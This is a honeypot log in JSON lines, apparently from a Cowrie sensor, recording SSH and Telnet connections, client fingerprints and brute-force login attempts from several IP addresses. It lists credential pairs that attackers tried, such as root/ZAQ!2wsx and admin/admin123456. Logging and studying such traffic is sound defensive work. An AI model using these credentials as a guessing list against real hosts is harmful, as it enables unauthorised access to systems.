{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T16:23:00.624827Z","src_ip":"212.227.235.229","session":"5756edd4c16a"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:23:06.704628Z","src_ip":"212.227.235.229","session":"5756edd4c16a"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":41810,"dst_ip":"1.2.3.4","dst_port":22,"session":"e322aae5e387","protocol":"ssh","message":"New connection: 45.88.8.215:41810 (1.2.3.4:22) [session: e322aae5e387]","sensor":"my-vps","timestamp":"2025-08-26T16:23:11.388950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:23:12.408882Z","src_ip":"45.88.8.215","session":"e322aae5e387"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:23:12.409688Z","src_ip":"45.88.8.215","session":"e322aae5e387"}
{"eventid":"cowrie.login.success","username":"root","password":"Naresh@123","message":"login attempt [root/Naresh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:23:14.386229Z","src_ip":"45.88.8.215","session":"e322aae5e387"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:23:14.898648Z","src_ip":"45.88.8.215","session":"e322aae5e387"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57558,"dst_ip":"1.2.3.4","dst_port":23,"session":"8330790bb9a9","protocol":"telnet","message":"New connection: 212.227.125.160:57558 (1.2.3.4:23) [session: 8330790bb9a9]","sensor":"my-vps","timestamp":"2025-08-26T16:23:35.431683Z"}
{"eventid":"cowrie.session.closed","duration":30.412251710891724,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:24:05.843872Z","src_ip":"212.227.125.160","session":"8330790bb9a9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54452,"dst_ip":"1.2.3.4","dst_port":22,"session":"11932ba13001","protocol":"ssh","message":"New connection: 217.72.205.35:54452 (1.2.3.4:22) [session: 11932ba13001]","sensor":"my-vps","timestamp":"2025-08-26T16:24:13.215536Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:24:13.216644Z","src_ip":"217.72.205.35","session":"11932ba13001"}
{"eventid":"cowrie.session.connect","src_ip":"65.49.1.133","src_port":50115,"dst_ip":"1.2.3.4","dst_port":22,"session":"aab30bb1e02c","protocol":"ssh","message":"New connection: 65.49.1.133:50115 (1.2.3.4:22) [session: aab30bb1e02c]","sensor":"my-vps","timestamp":"2025-08-26T16:24:14.254162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:24:14.254972Z","src_ip":"65.49.1.133","session":"aab30bb1e02c"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-08-26T16:24:14.425767Z","src_ip":"65.49.1.133","session":"aab30bb1e02c"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:24:18.271830Z","src_ip":"65.49.1.133","session":"aab30bb1e02c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42047,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd7b5228e95a","protocol":"ssh","message":"New connection: 212.227.235.229:42047 (1.2.3.4:22) [session: dd7b5228e95a]","sensor":"my-vps","timestamp":"2025-08-26T16:24:31.686406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T16:24:31.687513Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T16:24:31.813160Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123456","message":"login attempt [admin/admin123456] failed","sensor":"my-vps","timestamp":"2025-08-26T16:24:32.397332Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"lfr42100","message":"login attempt [admin/lfr42100] failed","sensor":"my-vps","timestamp":"2025-08-26T16:24:33.524940Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@321","message":"login attempt [admin/admin@321] failed","sensor":"my-vps","timestamp":"2025-08-26T16:24:34.653010Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-26T16:24:35.780848Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"asdfghjkl","message":"login attempt [admin/asdfghjkl] failed","sensor":"my-vps","timestamp":"2025-08-26T16:24:36.908260Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:24:38.036232Z","src_ip":"212.227.235.229","session":"dd7b5228e95a"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":53588,"dst_ip":"1.2.3.4","dst_port":22,"session":"52ed400ca6d0","protocol":"ssh","message":"New connection: 193.32.162.145:53588 (1.2.3.4:22) [session: 52ed400ca6d0]","sensor":"my-vps","timestamp":"2025-08-26T16:25:39.662580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:25:39.664094Z","src_ip":"193.32.162.145","session":"52ed400ca6d0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T16:25:39.694459Z","src_ip":"193.32.162.145","session":"52ed400ca6d0"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123sol","message":"login attempt [ubuntu/123sol] failed","sensor":"my-vps","timestamp":"2025-08-26T16:25:39.786767Z","src_ip":"193.32.162.145","session":"52ed400ca6d0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:25:40.819765Z","src_ip":"193.32.162.145","session":"52ed400ca6d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59255,"dst_ip":"1.2.3.4","dst_port":23,"session":"eab801ed3e81","protocol":"telnet","message":"New connection: 212.227.235.229:59255 (1.2.3.4:23) [session: eab801ed3e81]","sensor":"my-vps","timestamp":"2025-08-26T16:26:49.931288Z"}
{"eventid":"cowrie.session.closed","duration":12.843593120574951,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:27:02.774810Z","src_ip":"212.227.235.229","session":"eab801ed3e81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51030,"dst_ip":"1.2.3.4","dst_port":22,"session":"f139ae821b7e","protocol":"ssh","message":"New connection: 212.227.235.229:51030 (1.2.3.4:22) [session: f139ae821b7e]","sensor":"my-vps","timestamp":"2025-08-26T16:28:18.224148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:28:18.225042Z","src_ip":"212.227.235.229","session":"f139ae821b7e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T16:28:18.433452Z","src_ip":"212.227.235.229","session":"f139ae821b7e"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"123","message":"login attempt [frappe/123] failed","sensor":"my-vps","timestamp":"2025-08-26T16:28:19.060193Z","src_ip":"212.227.235.229","session":"f139ae821b7e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:28:20.270481Z","src_ip":"212.227.235.229","session":"f139ae821b7e"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":41680,"dst_ip":"1.2.3.4","dst_port":22,"session":"26e343e41870","protocol":"ssh","message":"New connection: 45.88.8.186:41680 (1.2.3.4:22) [session: 26e343e41870]","sensor":"my-vps","timestamp":"2025-08-26T16:28:55.930881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:28:56.509416Z","src_ip":"45.88.8.186","session":"26e343e41870"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:28:56.510958Z","src_ip":"45.88.8.186","session":"26e343e41870"}
{"eventid":"cowrie.login.success","username":"root","password":"ZAQ!2wsx","message":"login attempt [root/ZAQ!2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:28:58.927637Z","src_ip":"45.88.8.186","session":"26e343e41870"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:28:59.493063Z","src_ip":"45.88.8.186","session":"26e343e41870"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56166,"dst_ip":"1.2.3.4","dst_port":22,"session":"01d2cd6d5c6c","protocol":"ssh","message":"New connection: 217.72.205.35:56166 (1.2.3.4:22) [session: 01d2cd6d5c6c]","sensor":"my-vps","timestamp":"2025-08-26T16:31:06.212609Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:31:06.213639Z","src_ip":"217.72.205.35","session":"01d2cd6d5c6c"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":38102,"dst_ip":"1.2.3.4","dst_port":22,"session":"50e67aa47708","protocol":"ssh","message":"New connection: 193.32.162.145:38102 (1.2.3.4:22) [session: 50e67aa47708]","sensor":"my-vps","timestamp":"2025-08-26T16:32:17.171016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:32:17.171796Z","src_ip":"193.32.162.145","session":"50e67aa47708"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T16:32:17.202883Z","src_ip":"193.32.162.145","session":"50e67aa47708"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123solana","message":"login attempt [ubuntu/123solana] failed","sensor":"my-vps","timestamp":"2025-08-26T16:32:17.295047Z","src_ip":"193.32.162.145","session":"50e67aa47708"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:32:18.327811Z","src_ip":"193.32.162.145","session":"50e67aa47708"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13656,"dst_ip":"1.2.3.4","dst_port":22,"session":"83d74f61e61b","protocol":"ssh","message":"New connection: 212.227.125.160:13656 (1.2.3.4:22) [session: 83d74f61e61b]","sensor":"my-vps","timestamp":"2025-08-26T16:32:22.498144Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:32:22.499351Z","src_ip":"212.227.125.160","session":"83d74f61e61b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13948,"dst_ip":"1.2.3.4","dst_port":22,"session":"65b6a1684c25","protocol":"ssh","message":"New connection: 212.227.125.160:13948 (1.2.3.4:22) [session: 65b6a1684c25]","sensor":"my-vps","timestamp":"2025-08-26T16:32:22.611865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:32:22.613236Z","src_ip":"212.227.125.160","session":"65b6a1684c25"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sh